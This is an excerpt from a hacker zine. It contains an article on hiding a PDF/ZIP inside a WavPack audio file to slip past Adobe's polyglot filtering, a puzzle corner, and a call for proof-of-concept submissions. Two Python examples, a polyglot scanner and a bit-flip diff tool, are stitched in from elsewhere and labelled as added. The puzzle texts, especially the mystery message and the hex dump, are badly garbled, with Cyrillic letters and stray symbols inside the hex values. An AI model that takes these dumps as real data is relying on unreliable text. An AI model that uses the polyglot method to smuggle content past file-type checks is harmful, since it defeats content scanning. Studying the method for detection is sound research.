Root rights are a grrl's best, best friend!
12 What if you could listen to this PDF?


by Philippe Teuwen 


To honor the tradition of polyglot releases, this PDF is also an audio file featuring a 24-bit studio recording of foz' Root Rights are a Grrl's Best Friend, which you can enjoy with MPlayer or VLC media player.

There are some official ways to embed an audio file in a PDF, such as LaTeX's media9 package. Unfortunately, that would only work in Adobe Acrobat Reader, provided that you also install Adobe Flash, quite a reckless prerequisite nowadays. We are not such bad neighbors, so we looked for alternatives.

Adobe, once again, is out to search-and-destroy polyglots, so all common audio file types such as WAV, MP3, M4A, 3GP, AAC, FLAC, are prohibited. Still, some less popular formats remain undetected, up until now! Among the free lossless formats these are True Audio (.tta) and WavPack (.wv).

The TTA frame structure³⁰ is unfortunately too rigid and doesn't allow much trickery to inject the start of the PDF within the first kilobyte. It supports standard tagging by ID3v1/v2 and APEv2, but prepending ID3 info is banned by Acrobat. The APEv2 specification,³¹ on the other hand, strongly recommends against using it at the beginning of a file. In practice, audio readers don't support files starting with APEv2.

The WavPack file format³² is quite unusual, but far more friendly to us: it doesn't have a file header, but every block starts with the same magic wvpk. We can add new metadata blocks at the beginning of the file, and they support DUMMY sub-blocks, meant for padding. So we can inject the beginning of a PDF, but can we use those sub-blocks to inject the full PDF in our WavPack? For each sub-block the theoretical size is 16 Mb, but in practice MPlayer accepts a maximum of 1,047,548 bytes and VLC 1,048,548 bytes, and only one such sub-block per block. So it's possible, but it would be quite impractical to slice the PDF in 1Mb chunks. WavPack also supports ID3v1 and APEv2. ID3v1 is too limited (only ID3v2 allows PRIV frames), so we have to rely on APEv2 to inject the bulk of the PDF (and ZIP, as usual) in a large metadata frame.


We now have the ingredients to build a PDF/ZIP/WavPack polyglot file. The final file structure, from the three perspectives, is depicted on the right. All starred items contain a size or an offset that depends on another part of the polyglot, so the file is built in two passes. The first pass puts the elements together, and then the second pass adjusts those fields in the WavPack and ZIP.

[Figure: the final file layout as seen from the WavPack, PDF and ZIP perspectives; items top to bottom: PDF header, obj/stream, Local File Headers, actual content, Central Directory *, APEv2 footer *.]
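The container structures just described, walked by an added example that is neither the article's build script nor WavPack project code. It follows the block header and metadata sub-block layout from the WavPack format description and the APEv2 tag layout, from the other side of the fence: instead of building the polyglot, it scans a file for the tell-tale signs (a DUMMY sub-block that is not all zeros, a PDF header inside the first kilobyte, an oversized binary APEv2 item). make_sample() builds a constructed container with no audio in it at all, only the framing; the size fields it fills (ckSize, the APEv2 tag size) are the ones the text says need a second pass.

```python
"""Inspect a WavPack-framed file for non-audio payloads hidden in its container.

Added example, not code from the article or from the WavPack project. Block and
sub-block layout follow wavpack.com/file_format.txt; the APEv2 layout follows
the APEv2 specification. make_sample() is constructed and carries no audio.
"""
import struct

WV_MAGIC = b"wvpk"
ID_LARGE, ID_ODD_SIZE, ID_DUMMY = 0x80, 0x40, 0x00   # sub-block id bits / padding id
APE_PREAMBLE = b"APETAGEX"
APE_BINARY = 0x2          # APEv2 item flag: value is binary, not UTF-8 text


def sub_block(meta_id, data):
    """Encode one metadata sub-block: id byte, size in 16-bit words, data padded to even length."""
    odd = len(data) % 2
    words = (len(data) + odd) // 2
    flags = ID_ODD_SIZE if odd else 0
    if words > 0xFF:  # ID_LARGE: 24-bit word count, the "16 Mb" ceiling the article mentions
        hdr = bytes([meta_id | flags | ID_LARGE]) + struct.pack("<I", words)[:3]
    else:
        hdr = bytes([meta_id | flags, words])
    return hdr + data + (b"\0" if odd else b"")


def wv_block(sub_blocks):
    """Prefix sub-blocks with the 32-byte block header; ckSize counts everything after its own field."""
    body = b"".join(sub_blocks)
    # ckID, ckSize, version, block_index_u8, total_samples_u8, total_samples,
    # block_index, block_samples, flags, crc: audio fields are zero (constructed, no samples)
    return struct.pack("<4sIHBBIIIII", WV_MAGIC, 24 + len(body), 0x410, 0, 0, 0, 0, 0, 0, 0) + body


def ape_tag(items):
    """Build an APEv2 header + items + footer; items are (key, value, is_binary)."""
    body = b""
    for key, value, is_binary in items:
        body += struct.pack("<II", len(value), APE_BINARY if is_binary else 0)
        body += key.encode("ascii") + b"\0" + value
    tag_size = len(body) + 32          # items plus footer, header excluded: the second-pass field

    def hf(is_header):                 # bit 31: tag has a header; bit 29: this block is the header
        flags = 0xA0000000 if is_header else 0x80000000
        return APE_PREAMBLE + struct.pack("<IIII", 2000, tag_size, len(items), flags) + b"\0" * 8
    return hf(True) + body + hf(False)


def parse_sub_blocks(body):
    """Return [(id, data)] for every sub-block in a block body."""
    out, pos = [], 0
    while pos < len(body):
        tag = body[pos]
        if tag & ID_LARGE:
            words, pos = int.from_bytes(body[pos + 1:pos + 4], "little"), pos + 4
        else:
            words, pos = body[pos + 1], pos + 2
        size = words * 2 - (1 if tag & ID_ODD_SIZE else 0)
        out.append((tag & 0x3F, body[pos:pos + size]))
        pos += words * 2
    return out


def inspect_wavpack(data):
    """Walk the wvpk blocks and the APEv2 footer; report what a type detector would miss."""
    report = {"blocks": 0, "dummy_payload_bytes": 0, "ape_items": [],
              "pdf_header_offset": data.find(b"%PDF-")}
    pos = 0
    while data.startswith(WV_MAGIC, pos):
        ck_size = struct.unpack_from("<I", data, pos + 4)[0]
        for meta_id, payload in parse_sub_blocks(data[pos + 32:pos + 8 + ck_size]):
            if meta_id == ID_DUMMY and payload.strip(b"\0"):   # padding should be all zeros
                report["dummy_payload_bytes"] += len(payload)
        report["blocks"] += 1
        pos += 8 + ck_size
    if data[-32:].startswith(APE_PREAMBLE):   # footer is last unless an ID3v1 tag follows it
        tag_size, count = struct.unpack_from("<II", data, len(data) - 32 + 12)
        p = len(data) - tag_size
        for _ in range(count):
            vsize, vflags = struct.unpack_from("<II", data, p)
            key_end = data.index(b"\0", p + 8)
            report["ape_items"].append((data[p + 8:key_end].decode("ascii"), vsize, bool(vflags & APE_BINARY)))
            p = key_end + 1 + vsize
    return report


def looks_like_polyglot(report, binary_limit=4096):
    """Flag non-zero DUMMY padding, an early PDF header, or an oversized binary tag item."""
    return (report["dummy_payload_bytes"] > 0
            or 0 <= report["pdf_header_offset"] < 1024
            or any(binary and size > binary_limit for _, size, binary in report["ape_items"]))


def make_sample():
    """Constructed sample: PDF head in a DUMMY sub-block, PDF tail in a binary APEv2 item."""
    pdf_head = b"%PDF-1.3\n1 0 obj\n<<>>\nendobj\n"      # 29 bytes, stand-in for a real header
    pdf_tail = b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"    # 32 bytes
    return wv_block([sub_block(ID_DUMMY, pdf_head)]) + ape_tag(
        [("Title", b"Root Rights", False), ("PDF", pdf_tail, True)])


if __name__ == "__main__":
    print(inspect_wavpack(make_sample()))
```

The report for the constructed sample shows one block, 29 non-zero bytes of "padding", a PDF header at offset 34 and a binary APEv2 item, which is exactly the combination a scanner that trusts the wvpk magic alone would wave through.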


By the way, the artwork on page 60 is by Ange and myself, derived from Vectorportal's artwork³³ licensed under a Creative Commons Attribution 3.0 Unported License.





³⁰ http://en.true-audio.com/TTA_Lossless_Audio_Codec_-_Format_Description
³¹ http://wiki.hydrogenaud.io/index.php?title=APEv2_specification
³² http://www.wavpack.com/file_format.txt
³³ http://www.vecteezy.com/people/23511-marilyn-monroe-vector
13 Oona's Puzzle Corner!


by Oona Räisänen 


13.1 Mystery Message 


Peter sits in the front of the classroom. One day during class this message was passed to him. 


>00 SOILMOr LEGLI УСЦО>ОО Ја VI EIL. 
LILI HOL. LEKLkLU <ek< 10> Fo цици 
Cer J0 УПО ПО ><FLiV Se PDTILI 

LIL ILWUe Ie of «EE «PF ЈО>П PIE IEIVET: el 
VIIILL UO JEHO Fo PLI «FL. 


13.2 Bit Flip Trouble 


Mary keeps two copies of a precious file. But one of the copies has been corrupted in memory due to a recent 
Rowhammer attack. Can you find all the flipped bits in the samples below? Can you even tell which one is 
the original? 


0000000: 2550 4446 2431 2e33 0a31 2030 206f 626a 2550 4446 2d31 2e33 0a31 2030 a06f 626a 
0000010: Oa3c 3c20 2#54 7970 6520 2f43 6174 616c Оазс 3c20 2f44 7970 6520 2f4b 6174 616c 
0000020: 6f67 202f 5061 6765 7320 3220 3020 5220 6f67 a02f 5061 6765 7320 3220 3020 5220 
0000030: Зезе 0a65 беба 6f62 баба 3220 3020 6f62 3e3e 0a65 6664 6162 баба 3220 3020 6162 
0000040: баба 3c3c 2025 5479 7065 7320 2150 6167 баба 3c3c a02f 5479 7065 7321 2150 6167 
0000050: 6573 2025 4969 6473 205b 2033 2030 2052 6573 2021 4069 6473 205b 2033 2030 2052 
0000060: 205d 202? 4365 756e 7420 3120 3e3e Оаб5 205d 2021 4361 756e 7420 3120 3e3e 0a65 
0000070: 6e64 6162 баба 3320 3020 662 баба 3c3c 6e64 666 баба 3320 3020 6162 беба 3c3c 
0000080: 2021 5479 7065 2021 5061 6765 202: 5061 2021 5479 7065 2021 5061 6765 2021 5061 
0000090: 7265 6e74 2032 2030 2052 2021 5265 736: 7265 6e74 2032 2030 2052 2024 5245 f36f 
00000a0: 7572 6365 7320 3c3c 2021 4661 6e74 2032 7572 6365 7321 3c3c 2021 4661 6e74 203c 
00000b0: 3c20 2146 3120 3c3c 2025 5479 7065 2024 3с20 2546 3120 3c3c 202: 5479 7065 202: 
00000с0: 4661 6e74 2025 5375 6274 7970 6520 2154 4661 6e74 2024 5375 6274 7970 6521 2154 
00000а0: 7970 6531 2025 4261 7365 4661 6e74 2024 7971 6531 2021 4261 7365 466 6e64 202: 
00000е0: 4172 6961 6c20 3e3e 203e 3e20 Зезе 202: 4172 6961 6с20 Зезе 203e 3e20 Зезе 202 
00000f0: 436f 6e74 656e 7473 2034 2030 2052 203e 4365 6e74 256e 7473 2034 2030 2056 203e 
0000100: Зеба 656e 646f 626a база 2030 206f 626a Зеба 656e 646f 626a база 2030 206f 626a 
0000110: Oa3c 3c3e Зеба 7374 7265 616d 0a42 540a Оазс 3c3e Зеба 7374 7265 616d 0a42 540a 
0000120: 2f46 3120 3430 2054 660a 3430 2037 3030 2f06 3120 3430 2044 620a 3430 2037 3030 
0000130: 2054 640a 2853 7475 6666 2074 6f20 6275 2054 640a 2853 7475 6666 2074 6f20 6275 
0000140: 793a 2920 546a 0a30 202d 3830 2054 640a 793a 2920 546a 0a30 202d 3830 2054 640a 
0000150: 282d 2044 4452 3429 2054 баба 3020 2d38 082d 2044 4452 3329 2054 баба 3020 2438 
0000160: 3020 5464 0a28 2420 6861 7264 2064 7269 3020 5474 0a28 2420 6861 7264 2064 7269 
0000170: 7665 2920 546a 0a45 540a 656e 6473 7472 7665 2921 546a 0a65 540a 656e 6473 7472 
0000180: 6561 баба 656e 646f 626a Оа74 7261 696c 6561 баба 656e e46f 626a 0a74 7261 696c 
0000190: 6572 Oa3c 3c20 2652 6Е6Е 7420 3120 3020 6572 O0a3c 3c20 2f56 6f6f 7420 3120 3020 
00001a0: 523e Зеба 2525 4541 460a 523e Зеба 2525 4541 460a 


Hint: !noisiv oerets ruoy esU 
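A small diffing tool for the kind of comparison this puzzle asks for, added here as an example (not part of the puzzle or of the original page). It parses dump lines in the offset-plus-hex-words style used above into bytes, lists every differing bit as (byte offset, bit index), and applies one heuristic for text-like files such as a PDF skeleton: the copy whose bytes at the differing offsets more often fall outside printable ASCII is the corrupted one. The two dumps below are constructed, not the puzzle's data; in real life the answer to "which copy is original" comes from a stored hash, and the heuristic only ranks candidates when no hash exists.

```python
"""Locate flipped bits between two copies of a file and guess which copy is intact.

Added example, not part of the puzzle or the original page. DUMP_A and DUMP_B
are constructed: a PDF skeleton and a copy of it with three single-bit flips.
"""


def parse_xxd(dump):
    """Parse lines like "0000000: 2550 4446 ..." into bytes, ignoring the offset column."""
    out = bytearray()
    for line in dump.strip().splitlines():
        _, _, hexpart = line.partition(":")
        out += bytes.fromhex(hexpart.replace(" ", ""))
    return bytes(out)


def flipped_bits(copy_a, copy_b):
    """Return [(byte_offset, bit_index)] for every bit that differs between the copies."""
    if len(copy_a) != len(copy_b):
        raise ValueError("copies differ in length; this is not a bit-flip corruption")
    flips = []
    for offset, (x, y) in enumerate(zip(copy_a, copy_b)):
        diff = x ^ y
        for bit in range(8):
            if diff >> bit & 1:
                flips.append((offset, bit))
    return flips


def likely_original(copy_a, copy_b):
    """Heuristic for text-like files: the corrupted copy has more non-printable bytes at the
    differing offsets. Returns 0 for copy_a, 1 for copy_b, None on a tie."""
    offsets = {off for off, _ in flipped_bits(copy_a, copy_b)}

    def printable(copy):
        return sum(1 for off in offsets if 0x20 <= copy[off] < 0x7F or copy[off] in b"\n\r\t")
    a, b = printable(copy_a), printable(copy_b)
    return None if a == b else (0 if a > b else 1)


# Constructed dumps: "%PDF-1.3\n1 0 obj\n<< /Type /Catal" and a copy with three flips
# (offset 4: '-' -> '%', offset 13: 'o' -> 0xEF, offset 20: '/' -> '.').
DUMP_A = """0000000: 2550 4446 2d31 2e33 0a31 2030 206f 626a
0000010: 0a3c 3c20 2f54 7970 6520 2f43 6174 616c"""
DUMP_B = """0000000: 2550 4446 2531 2e33 0a31 2030 20ef 626a
0000010: 0a3c 3c20 2e54 7970 6520 2f43 6174 616c"""

if __name__ == "__main__":
    a, b = parse_xxd(DUMP_A), parse_xxd(DUMP_B)
    print(flipped_bits(a, b), "original is copy", likely_original(a, b))
```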
13.3 Interpolation Colorization


Sadie really likes to convolve with this kernel. But she only took with her a travel pack containing a limited 
set of discrete samples. Use a colored pencil to connect the integer-valued dots (1, 2, 3, ...). Then repeat 
using a different color but include also the decimal-valued dots. What do you see? How is this related to 
interpolation and sampling rates? If you recognize the kernel, how would you help Sadie generate even more 
points? 
13.4 Hacker Jumble


Max has been trying to memorize some topical words for his upcoming infosec specialist appearance in the 
news. But now they're all lying on his hotel room floor and he has trouble finding them. How many words 
can you find? What has happened to them during the night that makes them so difficult to see? 


FVBGFNGU<AOE BBR B 
UF V SER CHF EGEN FZ 
NH NEA FNGRR UN ZF X J 
PN JEF NJ JER B S P JU / V V 
F YR U E U LB R Z BY УМА 
R QBE AV VJ ZEER RR Q 
R RL ZE QR UN RES LAB 
FJ GY ЈАх ММ ОМА СЈ 
HBYNQHAZTCVANGF 
TRY QRUGZBYES ОМС 
OAWRRCURYQVVVER 
RF Y H QF F EG R BP FE A 
VQOSE RN XB BG Y BQN 
UN PX VAT GR NZ GA VA 
14 Fast Cash for Cyber Munitions!


by Pastor Manul Laphroaig,
Unlicensed Proselytizer
International Church of the Weird Machines

Howdy, neighbor!

Are you one of those merchants of cyber-death that certain Thought Leading Technologists keep warning us about? Have you been hoarding bugs instead of sharing them with the world? Well, at this church we won't judge you, but we'd be happy to judge your proofs of concept, sharing the best ones with our beloved readers.

So set that little PoC free, neighbor, and let it come to me, pastor@phrack.org!


Do this: write an email telling our editors how to reproduce ONE clever, technical trick from your research. If you are uncertain of your English, we'll happily translate from French, Russian, Southern Appalachian and German. If you don't speak those languages, we'll draft a translator from those poor sods who owe us favors.

Like an email, keep it short. Like an email, you 
should assume that we already know more than a 
bit about hacking, and that we'll be insulted or— 
WORSE!—that we'll be bored if you include a long 
tutorial where a quick reminder would do. 

Just use 7-bit ASCII if your language doesn't require funny letters, as whenever we receive something typeset in OpenOffice, we briefly mistake it for a ransom note. Don't try to make it thorough or broad. Don't use bullet-points, as this isn't a damned Powerpoint deck. Keep your code samples short and sweet; we can leave the long-form code as an attachment. Do not send us TeX; it's our job to do the typesetting!

Do pick one quick, clever low-level trick and explain it in a few pages. Teach me how to turn Davisson's benign tumor from page 26 into a malignant tumor. Teach me how to scan the entire APRS-IS network for Vogelfrei's tricks from page 34. Don't tell me that it's possible; rather, teach me how to do it myself with the absolute minimum of formality and bullshit.

Like an email, we expect informal (or faux-biblical) language and hand-sketched diagrams. Write it in a single sitting, and leave any editing for your poor preacherman to do over a bottle of fine scotch. Send this to pastor@phrack.org and hope that the neighborly Phrack folks, praise be to them!, aren't man-in-the-middling our submission process.





Yours in PoC and Pwnage, 
Pastor Manul Laphroaig, D.D. 


